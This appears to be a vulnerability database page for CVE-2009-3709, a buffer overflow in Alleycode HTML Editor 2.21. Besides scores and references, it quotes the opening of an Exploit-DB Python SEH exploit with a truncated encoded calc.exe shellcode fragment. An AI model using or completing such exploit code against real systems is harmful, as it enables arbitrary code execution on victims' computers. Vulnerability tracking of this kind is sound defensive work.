CVE-2009-3709
published 2009-10-16CVE-2009-3709: Stack-based buffer overflow in the Meta Content Optimizer in Konae Technologies Alleycode HTML Editor 2.21 allows user-assisted remote attackers to execute…
PriorityP343critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
5.90%
92.3th percentile
Stack-based buffer overflow in the Meta Content Optimizer in Konae Technologies Alleycode HTML Editor 2.21 allows user-assisted remote attackers to execute arbitrary code via a long value in a TITLE tag.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| konae | alleycode_html_editor | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Alleycode HTML Editor 2.2.1 - Local Buffer Overflow
exploitdb·2009-10-29
CVE-2009-3709 Alleycode HTML Editor 2.2.1 - Local Buffer Overflow
Alleycode HTML Editor 2.2.1 - Local Buffer Overflow
---
#!/usr/bin/env python
####################################################################
#
# Alleycode HTML Editor 2.21 Local (.HTML) Overflow Exploit (SEH)
# Coded By: Dr_IDE
# Found By: Rafael de Sousa
# Tested On: XPSP0 (SP3 doesn't have any usable P/P/R)
# Download: www.alleycode.com
#
####################################################################
# calc.exe - 303 bytes
# Encoder - alpha/upper
# EXITFUNC - SEH
sc = (
"\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49"
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41"
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42"
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a"
"\x48\x47\x3
Exploit-DB
Alleycode 2.21 - Local Overflow (SEH)
exploitdb·2009-10-05
CVE-2009-3709 Alleycode 2.21 - Local Overflow (SEH)
Alleycode 2.21 - Local Overflow (SEH)
---
What is AlleyCode?
AlleyCode is a free html editor. Alleycode was chosen as one of the best freebies on the Net. The entire list of the ' 101 Fabulous Freebies' was featured in the May 2006 issue of PCWorld Magazine. Thanks PCWorld...
Alleycode is a fast, sleek and highly productive award winning HTML editor with unique features. If you are new to HTML, Alleycode's great tutorial will walk you through your first coding steps... If you are an established coder you will find a refreshing, non-bloated infrastructure with fast and accurate delivery. Beyond HTML, Alleycode's wizardry focuses on PHP and CSS interaction for professional and easy management of your projects. Best of all, Alleycode is FREE! (we do accept donations if you find it useful)
http://osvdb.org/58649http://packetstormsecurity.org/0910-exploits/alleycode-overflow.txthttp://secunia.com/advisories/36940http://www.securityfocus.com/archive/1/506987/100/0/threadedhttp://osvdb.org/58649http://packetstormsecurity.org/0910-exploits/alleycode-overflow.txthttp://secunia.com/advisories/36940http://www.securityfocus.com/archive/1/506987/100/0/threaded
2009-10-16
Published